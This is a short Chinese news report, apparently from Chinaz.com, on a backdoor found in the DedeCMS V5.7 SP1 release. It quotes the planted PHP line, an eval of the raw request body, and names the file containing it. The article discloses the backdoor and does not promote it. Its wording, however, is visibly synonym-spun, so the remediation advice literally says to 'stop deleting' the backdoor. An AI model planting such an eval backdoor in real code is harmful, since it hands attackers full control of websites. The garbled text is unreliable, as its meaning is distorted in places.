Dedecms被曝疑似植入后门 可胜利控制网站

站长之家（Chinaz.com）3月21日报道：昨日，乌云漏洞平台发布最新报告称，著名开源建站软件Dedecms V5.7 SP1正式版被植入后门，经过该后门可胜利入侵并控制利用dedecms的网站。

Dedecms被曝植入后门（站长之家配图）

据乌云报告，被植入的后门是在/include/shopcar.class.php文件中，被植入的代码为@eval(file_get_contents(‘php://input’));，乌云引见称，经过该后门可胜利入侵dedecms网站。有网友对植入的该后门予以证明，称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。

据了解，@eval(file_get_contents(‘php://input’));是将申请的数据流作为脚本言语执行，经过该后门，可能上传PHP后门来控制整个网站。利用Dedecms V5.7 SP1正式版建站的站长，需立即对后门代码停止删除，以保护网站平安。

Dedecms是一款开源建站软件，其最早是由IT柏拉图集体开发，并在2007年停止了公司化运作。目前，国内有不少网站都利用了Dedecms系统，不过在Dedecms开创人IT柏拉图的分开后，Dedecms多次被曝出平安漏洞成绩。截至发稿，Dedecms民间尚未对该漏洞停止任何回应。